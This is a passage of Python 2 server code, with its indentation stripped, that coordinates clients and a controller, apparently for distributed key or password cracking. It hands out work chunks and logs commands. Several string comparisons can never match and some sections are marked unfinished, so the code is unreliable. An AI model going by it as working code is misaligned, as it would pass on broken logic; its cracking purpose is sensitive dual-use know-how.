print inst #__str__ allows args to be printed directly
print "========================================================================================"
#..................................................................................
#Get the IP Address
#..................................................................................
try: #getIP tryblock
print "STATUS: Getting your network IP adddress"
if(platform.system()=="Windows"):
print socket.gethostbyname(socket.gethostname())
elif(platform.system()=="Linux"):
#Source: http://stackoverflow.com/questions/11735821/python-get-localhost-ip
#Claims that this works on linux and windows machines
import fcntl
import struct
import os
def get_interface_ip(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s',ifname[:15]))[20:24])
#end of def
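#0x8915 is the Linux SIOCGIFADDR ioctl; bytes 20:24 of the returned ifreq
#struct hold the interface's IPv4 address as 4 packed bytes.
#Illustration (hypothetical result): get_interface_ip("eth0") -> "192.168.1.42"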
def get_lan_ip():
ip = socket.gethostbyname(socket.gethostname())
if ip.startswith("127.") and os.name != "nt":
interfaces = ["eth0","eth1","eth2","wlan0","wlan1","wifi0","ath0","ath1","ppp0"]
for ifname in interfaces:
try:
ip = get_interface_ip(ifname)
print "IP address was retrieved from the " + str(ifname) + " interface."
break
except IOError:
pass
return ip
#end of def
print get_lan_ip()
elif(platform.system()=="Darwin"):
print socket.gethostbyname(socket.gethostname())
else:
#NOTE: MAY REMOVE THIS AND REPLACE WITH THE LINUX DETECTION METHOD
print "INFO: The system has detected that you are not running Windows, OS X, or Linux."
print "INFO: System is using a generic IP detection method"
print socket.gethostbyname(socket.gethostname())
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception was thrown in getIP try block"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
print inst #__str__ allows args to be printed directly
print "========================================================================================"
#..................................................................................
#Preset the dictionary counters
#..................................................................................
self.recordOfOutboundCommandsFromServerToController['nextChunk'] = 0
self.recordOfOutboundCommandsFromServerToController['chunkAgain'] = 0
self.recordOfOutboundCommandsFromServerToController['waiting'] = 0
self.recordOfOutboundCommandsFromServerToController['done'] = 0
self.recordOfOutboundCommandsFromServerToClient['DONE'] = 0
self.recordOfOutboundCommandsFromServerToClient['nextChunk'] = 0
self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_NEXT_CHUNK'] = 0
self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_CHUNK_AGAIN'] = 0
self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_DONE'] = 0
self.recordOfInboundCommandsFromControllerToServer['Chunk_Objects'] = 0
self.recordOfInboundCommandsFromClientToServer['NEXT'] = 0
self.recordOfInboundCommandsFromClientToServer['FOUNDSOLUTION'] = 0
self.recordOfInboundCommandsFromClientToServer['CRASHED'] = 0
#..................................................................................
#Start listening to socket
#..................................................................................
self.serverSocket.listen(5)
print "Waiting for initial client to connect..."
#..................................................................................
#Waiting for initial Client to connect
#..................................................................................
sock, addr= self.serverSocket.accept()
print "INFO: First client has connected"
print "INFO: Connected with " + addr[0] + ":" + str(addr[1])
self.listOfClients.append((sock, addr)) #add the tuple to the list of clients
print "STATUS: Client successfully added to the list of clients"
#When a client is added, they are also added to the dictionaryOfCurrentClientTasks
self.dictionaryOfCurrentClientTasks[addr] = "" #Not working on anything, so value is the empty string
print "STATUS: Client successfully added to the Dictionary of Current Client Tasks"
#print str(len(self.listOfClients)) + " Client(s) are currently Connected."
#..................................................................................
#Server PRIMARY WHILE LOOP
#..................................................................................
try: #server primary while loop try block
while(self.serverIsRunning==True): #server primary while loop
#/////////////////////////////////////////////////////////////////////////////////
#Check for input from clients
#/////////////////////////////////////////////////////////////////////////////////
print "STATUS: Checking for input from client(s)..."
try: #check for client input try block
sock.settimeout(2.0)
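#the 2-second timeout turns the blocking recv() into a bounded poll, so each
#pass of the loop can still service the controller pipe and accept new clients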
theInput = sock.recv(2048) #listening for input
if(len(theInput) >= 1):
print "INFO: Received a message from a client."
if(self.checkForNextCommand(theInput)==True):
print "INFO: NEXT command was received"
self.sendNextChunkCommandToController()
elif(self.checkForFoundSolutionCommand(theInput)==True):
print "INFO: FOUNDSOLUTION command was received"
self.sendDoneCommandToController()
elif(self.checkForCrashedCommand(theInput)==True):
print "INFO: CRASHED command was received"
else:
print "ERROR: unknown command received"
print "The unknown command: '" + theInput + "'"
else:
print "INFO: The Empty String has been received."
except socket.timeout as inst:
print "STATUS: Socket has timed out. No input from client detected."
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Check for client input Try Block"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
print inst #__str__ allows args to be printed directly
print "========================================================================================"
#/////////////////////////////////////////////////////////////////////////////////
#Check for input from controller class
#/////////////////////////////////////////////////////////////////////////////////
print "STATUS: Checking for input from the Controller class..."
try: #check for input from controller try block
if(self.pipe.poll()):
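#pipe.poll() is non-blocking here: it only reports whether the controller has
#queued a message, so an idle controller never stalls the server loop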
recv = self.pipe.recv()
print "INFO: Received a message from the controller"
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#Determine what type of object the controller has sent the server
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#assume that a chunk object has been received, if not try again as a string
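#(EAFP idiom: attempt the Chunk attribute access first, and fall back to
#treating the received object as a plain string if .params does not exist)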
print "STATUS: Extracting String from received object..."
extractedTheString = False #records whether the string extraction succeeded
try: #attempt to extract params from a chunk object
chunkParams = recv.params
print "INFO: String has been extracted from a chunk object"
extractedTheString= True
self.recordOfInboundCommandsFromControllerToServer['Chunk_Objects'] = (self.recordOfInboundCommandsFromControllerToServer['Chunk_Objects'] + 1)
except Exception as inst:
#print "========================================================================================"
# print "ERROR: An exception has been thrown in the extract params from chunk object Try Block"
print "Received object is not a chunk object."
#print type(inst) #the exception instance
#print inst.args #arguments stored in .args
#print inst #__str__ allows args to be printed directly
#print "========================================================================================"
if(extractedTheString == False):
chunkParams = recv
print "INFO: String extracted from a String Object"
else: #if extractedTheString == True (meaning a chunk object)
print "STATUS: Extracting data from chunk object..."
chunkData = recv.data
print "INFO: Successfully extracted data from chunk object"
print "DEBUG: Data that was extracted: '" +str(chunkData) + "'"
if(len(chunkParams) < 1):
print "WARNING: Extracted the empty string from the chunk params"
else:
print "INFO: Successfully extracted params from chunk"
print "DEBUG: Info extracted from the received object: '" + str(chunkParams) + "'"
self.listOfControllerMessages.append(chunkParams)
print "INFO: The extracted string has been added to the listOfControllerMessages"
'''if(type(recv) is Chunk): #Determination by type definition
print "I/O: Received a Chunk Object From the Controller"
self.recordOfInboundCommandsFromControllerToServer['Chunk_Objects'] = (self.recordOfInboundCommandsFromControllerToServer['Chunk_Objects'] + 1)
inputChunkParams = recv.params #copy the parameters from the received object to the inputChunk
print "DEBUG: The recv.params: " + str(recv.params)
print "DEBUG: The inputChunkParams: " + str(inputChunkParams)
inputChunkData = recv.data #copy the data from the received object to the inputChunk
print "DEBUG: The recv.data: " + str(recv.data)
print "DEBUG: The inputChunkData: " + str(inputChunkData)
print " "
print "THIS FUNCTION IS NOT YET FINISHED"
print "-Need to begin to read information from the params lines"
print " "
elif(type(recv) is str):
print "I/O: Received a String Object From the Controller"
if(self.checkForNextChunk(recv)==True):
print "INFO: Received the reply to the NextChunk command"
elif(self.checkForChunkAgain(recv)==True):
print "INFO: Received the reply to the ChunkAgain command"
elif(self.checkForFound(recv)==True):
print "INFO: Received reply stating whether the key has been found or not"
else:
print "ERROR: Received an unknown command from the controller"
print "The unknown command: '" + str(recv) + "'"
else:
print " "
print "ERROR: Received a message with an invalid type: " + str(type(recv))
print " " '''
else:
print "STATUS: No command was received from the controller class"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Check for input from Controller class Try Block"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
print inst #__str__ allows args to be printed directly
print "========================================================================================"
#/////////////////////////////////////////////////////////////////////////////////
#Distribute command to clients if needed
#/////////////////////////////////////////////////////////////////////////////////
try: #distribute command try block
print "STATUS: Checking to see if a command needs to be send to the clients..."
#check to see if there are any commands that the controller has sent to the server
if(len(self.listOfControllerMessages) < 1):
print "INFO: There are no new commands from the controller class"
else:
print "INFO: There are " + str(len(self.listOfControllerMessages)) + " new command(s) from the controller class"
for i in range(0,len(self.listOfControllerMessages)):
print str(i) + ") " + str(self.listOfControllerMessages[i])
print " "
#print "INFO: " + str(len(self.dictionaryOfClientsWaitingForAReply)) + " Client(s) are currently waiting for a reply"
print "INFO: " + str(len(self.listOfClientsWaitingForAReply)) + " Client(s) are currently waiting for a reply"
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#Figure out what each received command is and who it needs to go to, then distribute accordingly
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
print " "
print "STATUS: Figuring Out What Each Command Is and Who It Needs To Be Sent To"
for i in range(0, len(self.listOfControllerMessages)):
print "Command " + str(i) + ") " + str(self.listOfControllerMessages[i])
analysisString= str(self.listOfControllerMessages[i])
#***************************************************************************************
#Looking for NEXTCHUNK command
#***************************************************************************************
if(analysisString[0] == "n"):
if(analysisString[1] == "e"):
if(analysisString[2] == "x"):
if(analysisString[3] == "t"):
if(analysisString[4] == "C"):
if(analysisString[5] == "h"):
if(analysisString[6] == "u"):
if(analysisString[7] == "n"):
if(analysisString[8] == "k"):
try: #looking for NEXTCHUNK in analysis string try block
print "Command Type: nextChunk"
#extract information from chunk
#get ip address of client waiting for reply
try: #send nextChunk message to client try block
tempAddr= self.listOfClientsWaitingForAReply[0]
tempSock, tempAddr2= self.findClientSocket(tempAddr)
clientMessage= str(analysisString)
#if(tempSock is None):
# raise Exception("tempSock is of type None! Unable to send message")
self.sendNextToClient(tempSock,tempAddr2,clientMessage)
del self.listOfClientsWaitingForAReply[0]
print "INFO: Removed client from the listOfClientsWaitingForAReply"
#print "DEBUG: AFTER MESSAGE WAS (SUPPOSEDLY) SENT TO CLIENT " + str(tempAddr)
print "DEBUG: Message: " + str(clientMessage)
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Send NEXTCHUNK message to client try block"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
print inst #__str__ allows args to be printed directly
print "========================================================================================"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the looking for NEXTCHUNK in analysis string Try Block"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
print inst #__str__ allows args to be printed directly
print "========================================================================================"
#***************************************************************************************
#Looking for DONE command
#***************************************************************************************
elif(analysisString[0:4] == "done"): #looking for DONE Command
print "Command Type: done"
print " "
print "Function Not Yet Completed, Thinking I might make this issue the done command to all clients"
print " "
#***************************************************************************************
#Command is unknown
#***************************************************************************************
else: #command is unknown
print "WARNING: Received Unknown Command From Controller:" + analysisString
print "INFO: Unknown Command is being ignored"
print "STATUS: Clearing listOfControllerMessages..."
del self.listOfControllerMessages[:]
print "STATUS: listOfControllerMessages has been cleared"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Distribute command to clients Try Block"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
print inst #__str__ allows args to be printed directly
print "========================================================================================"
#/////////////////////////////////////////////////////////////////////////////////
#Check to see if another client is trying to connect
#/////////////////////////////////////////////////////////////////////////////////
try: #check to see if another client is trying to connect try block
print "STATUS: Checking to see if another client is trying to connect..."
self.serverSocket.settimeout(2.0)
sock, addr =self.serverSocket.accept()
print "INFO: Connected with " + addr[0] + ":" + str(addr[1])
self.listOfClients.append((sock, addr))
print "INFO: Client successfully added to the list of clients"
print str(len(self.listOfClients)) + " Client(s) are currently Connected."
self.dictionaryOfCurrentClientTasks[addr] = "" #Client has no task currently, so value is the empty string
print "STATUS: Client was successfully added to the Dictionary of Current Client Tasks"
except socket.timeout as inst:
print "STATUS: Socket timed out. No client is trying to connect."
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Check to see if another client is trying to connect Try Block"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
print inst #__str__ allows args to be printed directly
print "========================================================================================"
finally:
print "INFO: Currently, there are " + str(len(self.listOfClients)) + " clients currently connected"
#..................................................................................
#END OF MAIN SERVER LOOP
#..................................................................................
except Exception as inst: #Exception for Server Primary While Loop Try Block
print "========================================================================================"
print "ERROR: An exception has been thrown in the Server Primary While Loop Try Block"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
print inst #__str__ allows args to be printed directly
print "========================================================================================"
finally:
print "Closing the socket..."
self.serverSocket.close()
print "Socket has been closed"
print "STATUS: Issuing the DONE command to clients..."
for x in range(0, len(self.listOfClients)):
(sock, addr) = self.listOfClients[x]
sock.sendall("DONE")
print "INFO: Issued the DONE command to client: " + str(addr)
print "STATUS: Finished Issuing the DONE command to clients"
try:
print " "
print "Printing List of Crashed Clients"
print "---------------------------------"
if(len(self.listOfCrashedClients) < 1):
print "No Clients Crashed During This Session"
else:
for x in range(0, len(self.listOfCrashedClients)):
print str(x) + ") " + str(self.listOfCrashedClients[x]) + " reported a Crash"
print "(END OF LIST OF CRASHED CLIENTS)"
print "---------------------------------"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Finally Block, in the print List of Crash Clients Section"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
print inst #__str__ allows args to be printed directly
print "========================================================================================"
try:
print " "
print "Printing List Of Clients Waiting For A Reply"
print "--------------------------------------------------"
if(len(self.listOfClientsWaitingForAReply) < 1):
print "No Clients Are Waiting For A Reply When The Session Ended"
else:
for x in range(0,len(self.listOfClientsWaitingForAReply)):
print "[" + str(x) + "] =" + str(self.listOfClientsWaitingForAReply[x])
print "(END OF LIST OF CLIENTS WAITING FOR A REPLY)"
print "--------------------------------"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Finally Block, in the print Dictionary of Clients Waiting For A Reply Section"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
print inst #__str__ allows args to be printed directly
print "========================================================================================"
try:
print " "
print "Printing List of Controller Messages (As the list was when the socket was closed)"
print "---------------------------------------------------------------------------------"
if(len(self.listOfControllerMessages) < 1):
print "There are no Messages from the Controller At this time"
else:
for x in range(0,len(self.listOfControllerMessages)):
print str(x) + ") " + str(self.listOfControllerMessages[x])
print "(END OF LIST OF CONTROLLER MESSAGES)"
print "-----------------------------------------"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Finally Block, in the print List of Controller Messages Section"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
print inst #__str__ allows args to be printed directly
print "========================================================================================"
try:
print " "
print "COMMAND RECORDS: Part 1/4"
print "Printing Record of OutBound Commands from Server to Controller"
print "----------------------------------------------------------------"
#print nextChunk records
if(self.recordOfOutboundCommandsFromServerToController['nextChunk'] > 0):
print "# of nextChunk Commands sent from Server to Controller: " + str(self.recordOfOutboundCommandsFromServerToController['nextChunk'])
else:
print "# of nextChunk Commands sent from Server to Controller: 0"
#print chunkAgain records
if(self.recordOfOutboundCommandsFromServerToController['chunkAgain'] > 0):
print "# of chunkAgain Commands sent from Server to Controller: " + str(self.recordOfOutboundCommandsFromServerToController['chunkAgain'])
else:
print "# of chunkAgain Commands sent from Server to Controller: 0"
#print waiting records
if(self.recordOfOutboundCommandsFromServerToController['waiting'] > 0):
print "# of waiting Commands sent from Server to Controller: " + str(self.recordOfOutboundCommandsFromServerToController['waiting'])
else:
print "# of waiting Commands sent from Server to Controller: 0"
#print done records
if(self.recordOfOutboundCommandsFromServerToController['done'] > 0):
print "# of done Commands sent from Server to Controller: " + str(self.recordOfOutboundCommandsFromServerToController['done'])
else:
print "# of done Commands sent from Server to Controller: 0"
print "(END OF RECORD OF OUTBOUND COMMANDS FROM SERVER TO CONTROLLER)"
print "---------------------------------------------------------------"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Finally Block, in the print Record of Outbound Commands from Server to Controller Section"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
print inst #__str__ allows args to be printed directly
print "========================================================================================"
try:
print " "
print "COMMAND RECORDS: Part 2/4"
print "Printing Record of Outbound Commands from Server to Client(s)"
print "------------------------------------------------------------"
#print the DONE records
if(self.recordOfOutboundCommandsFromServerToClient['DONE'] > 0):
print "# of DONE Commands sent from Server to Client(s): " + str(self.recordOfOutboundCommandsFromServerToClient['DONE'])
else:
print "# of DONE Commands sent from Server to Client(s): 0"
#print the nextChunk records
if(self.recordOfOutboundCommandsFromServerToClient['nextChunk'] > 0):
print "# of nextChunk Commands sent from Server to Client(s): " + str(self.recordOfOutboundCommandsFromServerToClient['nextChunk'])
else:
print "# of nextChunk Commands sent from Server to Client(s): 0"
print "(END OF RECORD OF OUTBOUND COMMANDS FROM SERVER TO CLIENT"
print "-----------------------------------------------------------"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Finally Block, in the print Record of Outbound Commands from Server to Client(s) Section"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
print inst #__str__ allows args to be printed directly
print "========================================================================================"
try:
print " "
print "COMMAND RECORDS: Part 3/4"
print "Printing Record of Inbound Commands from Controller to Server"
print "--------------------------------------------------------------"
#print the REPLY TO NEXT CHUNK
if(self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_NEXT_CHUNK'] > 0):
print "# of REPLY TO NEXT CHUNK Commands received from Controller: " + str(self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_NEXT_CHUNK'])
else:
print "# of REPLY TO NEXT CHUNK Commands received from Controller: 0"
#print the REPLY TO CHUNK AGAIN
if(self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_CHUNK_AGAIN'] > 0):
print "# of REPLY TO CHUNK AGAIN Commands received from Controller: " + str(self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_CHUNK_AGAIN'])
else:
print "# of REPLY TO CHUNK AGAIN Commands received from Controller: 0"
#print the REPLY TO DONE
if(self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_DONE'] > 0):
print "# of REPLY TO DONE Commands reeived from Controller: " + str(self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_DONE'])
else:
print "# of REPLY TO DONE Commands received from Controller: 0"
#print the Chunk Objects
if(self.recordOfInboundCommandsFromControllerToServer['Chunk_Objects'] > 0):
print "# of Chunk Objects received from Controller: " + str(self.recordOfInboundCommandsFromControllerToServer['Chunk_Objects'])
else:
print "# of Chunk Objects received from Controller: 0"
print "(END OF RECORD OF INBOUND COMMANDS FROM THE CONTROLLER)"
print "------------------------------------------------------------"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Finally Block, in the print Record of Inbound Commands from Controller Section"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
print inst #__str__ allows args to be printed directly
print "========================================================================================"
try:
print " "
print "COMMANDS RECORDS: Part 4/4"
print "Printing Inbound Commands from Client(s) to Server"
print "----------------------------------------------------"
#print NEXT
if(self.recordOfInboundCommandsFromClientToServer['NEXT'] > 0):
print "# of NEXT Commands received from Client(s): " + str(self.recordOfInboundCommandsFromClientToServer['NEXT'])
else:
print "# of NEXT Commands received from Client(s): 0"
#print FOUNDSOLUTION
if(self.recordOfInboundCommandsFromClientToServer['FOUNDSOLUTION'] > 0):
print "# of FOUNDSOLUTION Commands received from Client(s): " + str(self.recordOfInboundCommandsFromClientToServer['FOUNDSOLUTION'])
else:
print "# of FOUNDSOLUTION COmmands received from Client(s): 0"
#print CRASHED
if(self.recordOfInboundCommandsFromClientToServer['CRASHED'] > 0):
print "# of CRASHED Commands received from Client(s): " + str(self.recordOfInboundCommandsFromClientToServer['CRASHED'])
else:
print "# of CRASHED Commands received from Client(s): 0"
print "(END OF RECORD OF INBOUND COMMANDS FROM CLIENT(S))"
print "------------------------------------------------------"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception has been thrown in the Finally Block, in the print Record of Inbound Commands from Client(s) Section"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
print inst #__str__ allows args to be printed directly
print "========================================================================================"
print " "
#--------------------------------------------------------------------------------
#End of Constructor Block
#--------------------------------------------------------------------------------
#=================================================================================================
#SERVER-CONTROLLER COMMUNICATION FUNCTIONS
#This section contains methods that the server will use to communicate with the controller class
#=================================================================================================
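#A minimal sketch (an illustration under assumed names, not code from this
#project) of what the controller's end of this pipe protocol could look like:
#
#   server_end, controller_end = multiprocessing.Pipe()
#   if controller_end.poll():
#       cmd = controller_end.recv()          # "nextChunk", "chunkAgain", "waiting" or "done"
#       if cmd == "nextChunk":
#           controller_end.send(next_chunk)  # reply with a Chunk object or a params string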
#------------------------------------------------------------------------------
#Outbound communication with Controller
#------------------------------------------------------------------------------
#..............................................................................
#nextChunk
#..............................................................................
def sendNextChunkCommandToController(self):
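#asks the controller for the next chunk of work; the reply is picked up later
#by the pipe.poll() check in the server's primary while loop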
try:
self.pipe.send("nextChunk")
print "I/O: The NEXTCHUNK command was sent to the Controller"
#increment record counter
self.recordOfOutboundCommandsFromServerToController['nextChunk'] = (self.recordOfOutboundCommandsFromServerToController['nextChunk'] + 1)
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Controller Outbound sendNextChunkCommand Try Block"
#the exception instance
print type(inst)
#arguments stored in .args
print inst.args
#__str__ allows args to be printed directly
print inst
print "============================================================================================="
#..............................................................................
#chunkAgain
#..............................................................................
def sendChunkAgainCommandToController(self):
try:
self.pipe.send("chunkAgain")
print "I/O: The CHUNKAGAIN command was sent to the Controller"
#increment the record counter
self.recordOfOutboundCommandsFromServerToController['chunkAgain'] = (self.recordOfOutboundCommandsFromServerToController['chunkAgain'] + 1)
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Controller Outbound sendChunkAgainCommand Try Block"
#the exception instance
print type(inst)
#arguments stored in .args
print inst.args
#__str__ allows args to be printed directly
print inst
print "============================================================================================="
#..............................................................................
#waiting
#..............................................................................
def sendWaitingCommandToController(self):
try:
self.pipe.send("waiting")
print "I/O: The WAITING command was sent to the Controller"
#increment the record counter
self.recordOfOutboundCommandsFromServerToController['waiting'] = (self.recordOfOutboundCommandsFromServerToController['waiting'] + 1)
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Controller Outbound sendWaitingCommend Try Block"
#the exception instance
print type(inst)
#arguments stored in .args
print inst.args
#__str__ allows args to be printed directly
print inst
print "============================================================================================="
#..............................................................................
#done
#..............................................................................
def sendDoneCommandToController(self):
try:
self.pipe.send("done ")
print "I/O: The DONE command was sent to the Controller"
#increment the record counter
self.recordOfOutboundCommandsFromServerToController['done'] = (self.recordOfOutboundCommandsFromServerToController['done'] + 1)
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Controller Outbound sendDoneCommand Try Block"
#the exception instance
print type(inst)
#arguments stored in .args
print inst.args
#__str__ allows args to be printed directly
print inst
print "============================================================================================="
#------------------------------------------------------------------------------
#Inbound communication with controller
#------------------------------------------------------------------------------
#..............................................................................
#REPLY TO NEXTCHUNK
#..............................................................................
def checkForNextChunk(self,inboundString): #check to see if the string contains the next chunk of the problem
try:
print "STATUS: Checking to see if inboundString is the next part of problem..."
if(len(inboundString) < 1):
return False
if inboundString == "nextChunk":
#position 9 will be a space
print "I/O: NEXTCHUNK command was received from the controller class"
self.listOfControllerMessages.append(str(inboundString))
print "INFO: NEXTCHUNK command was added to the listOfControllerMessages"
self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_NEXT_CHUNK'] = (self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_NEXT_CHUNK'] + 1)
return True
else:
return False
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Controller Inbound checkForNextChunk Try Block"
#the exception instance
print type(inst)
#arguments stored in .args
print inst.args
#__str__ allows args to be printed directly
print inst
print "============================================================================================="
#..............................................................................
#REPLY TO CHUNKAGAIN
#..............................................................................
def checkForChunkAgain(self,inboundString): #check to see if the string contains the chunk that was requested
try:
print "STATUS: Checking to see if inboundString is the requested chunk (chunkAgain)..."
if(len(inboundString) < 1):
return False
if(inboundString[0:9] == "CHUNKAGAIN"):
#position 10 will be a space
print "I/O: CHUNKAGAIN command was received from the controller class"
self.listOfControllerMessages.append(str(inboundString))
print "INFO: CHUNKAGAIN command was added to the listOfControllerMessages"
self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_CHUNK_AGAIN'] = (self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_CHUNK_AGAIN'] + 1)
return True
else:
return False
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Controller Inbound checkForChunkAgain Try Block"
#the exception instance
print type(inst)
#arguments stored in .args
print inst.args
#__str__ allows args to be printed directly
print inst
print "============================================================================================="
#..............................................................................
#REPLY TO DONE
#..............................................................................
def checkForFound(self,inboundString): #checks whether the inboundString says the key has been found (or not)
try:
print "STATUS: Checking to see if the key was found..."
if(len(inboundString) < 1):
return False
if(inboundString[0:4] == "Found"):
print "I/O: The Controller Says that the key has been Found"
print " "
print "This section of the code is NOT FINISHED YET"
print " -Need To Issue Done Command To All CLients at this point"
#print "STATUS: Issuing the DONE command to all clients..."
self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_DONE'] = (self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_DONE'] + 1)
return True
elif(inboundString[0:8] == "notFound"):
print "INFO: The Controller says that the key has not been found yet"
print " "
print "This Section of the code is NOT FINISHED YET"
print " -Need to tell client that no solution was found, request for the next chunk"
self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_DONE'] = (self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_DONE'] + 1)
return True
else:
return False
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Controller Inbound checkForFound Try Block"
#the exception instance
print type(inst)
#arguments stored in .args
print inst.args
#__str__ allows args to be printed directly
print inst
print "============================================================================================="
#=================================================================================================
#SERVER-CLIENT COMMUNICATION FUNCTIONS
#This section contains methods used by the server to communicate with the clients
#=================================================================================================
#------------------------------------------------------------------------------
#Outbound communication functions
#------------------------------------------------------------------------------
#..............................................................................
#DONE
#..............................................................................
def sendDoneCommandToClient(self,recipientsSocket, recipientIPAddress): #sends the DONE command to a client
try:
recipientsSocket.sendto("DONE", recipientIPAddress)
print "I/O: The DONE command was issued to: " + str(recipientIPAddress)
#increment the record counter
self.recordOfOutboundCommandsFromServerToClient['DONE'] = (self.recordOfOutboundCommandsFromServerToClient['DONE'] + 1)
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Client Outbound sendDoneCommand Try Block"
#the exception instance
print type(inst)
#arguments stored in .args
print inst.args
#__str__ allows args to be printed directly
print inst
print "============================================================================================="
#..............................................................................
#next part in cracking problem
#..............................................................................
def sendNextToClient(self,recipientsSocket, recipientIPAddress, theNextPart): #sends the next part of problem to the client
try:
recipientsSocket.sendto(theNextPart, recipientIPAddress)
print "I/O: The nextChunk of the problem was sent to: " + str(recipientIPAddress)
#increment the record counter
self.recordOfOutboundCommandsFromServerToClient['nextChunk'] = (self.recordOfOutboundCommandsFromServerToClient['nextChunk'] + 1)
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Client Outbound sendNext Try Block"
#the exception instance
print type(inst)
#arguments stored in .args
print inst.args
#__str__ allows args to be printed directly
print inst
print "============================================================================================="
#------------------------------------------------------------------------------
#Inbound communication functions
#------------------------------------------------------------------------------
#..............................................................................
#NEXT
#..............................................................................
def checkForNextCommand(self,inboundString): #checks for the NEXT command
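#expected wire format: "NEXT <client IP>" -- position 4 is a space, so the
#sender's IP address is read from position 5 onwards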
try:
if(inboundString[0]=="N"):
if(inboundString[1]=="E"):
if(inboundString[2]=="X"):
if(inboundString[3]=="T"):
print "I/O: A Client has issued the NEXT command"
#position 4 is a space
tempIP= ""
for i in range(5, len(inboundString)):
tempIP= tempIP + inboundString[i]
self.listOfClientsWaitingForAReply.append(tempIP)
#self.dictionaryOfClientsWaitingForAReply[tempIP] = "NEXTCHUNK"
print "INFO: Client (" + str(tempIP) + ") was added the listOfClientsWaitingForAReply"
#print "INFO: Client (" + str(tempIP) + ") was added the dictionaryOfClientsWaitingForAReply"
self.recordOfInboundCommandsFromClientToServer['NEXT'] = (self.recordOfInboundCommandsFromClientToServer['NEXT'] + 1)
return True
else:
return False
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Client Inbound checkForNextCommand Try Block"
#the exception instance
print type(inst)
#arguments stored in .args
print inst.args
#__str__ allows args to be printed directly
print inst
print "============================================================================================="
#..............................................................................
#FOUNDSOLUTION
#..............................................................................
def checkForFoundSolutionCommand(self,inboundString): #checks for the "FOUNDSOLUTION" string
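#expected wire format: "FOUNDSOLUTION <client IP>" -- position 13 is a space,
#so the sender's IP address is read from position 14 onwards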
try:
if(inboundString[0:13] == "FOUNDSOLUTION"):
print "I/O: A Client has issued the FOUNDSOLUTION command"
#position 13 is a space
tempIP= ""
for i in range(14, len(inboundString)):
tempIP= tempIP + inboundString[i]
self.listOfClientsWaitingForAReply.append(tempIP)
#print "INFO: Client (" + str(tempIP) + ") was added to the dictionaryOfClientsWaitingForAReply"
print "INFO: Client (" + str(tempIP) + ") was added to the listOfClientsWaitingForAReply"
self.recordOfInboundCommandsFromClientToServer['FOUNDSOLUTION'] = (self.recordOfInboundCommandsFromClientToServer['FOUNDSOLUTION'] + 1)
return True
else:
return False
except Exception as inst:
print "============================================================================================="
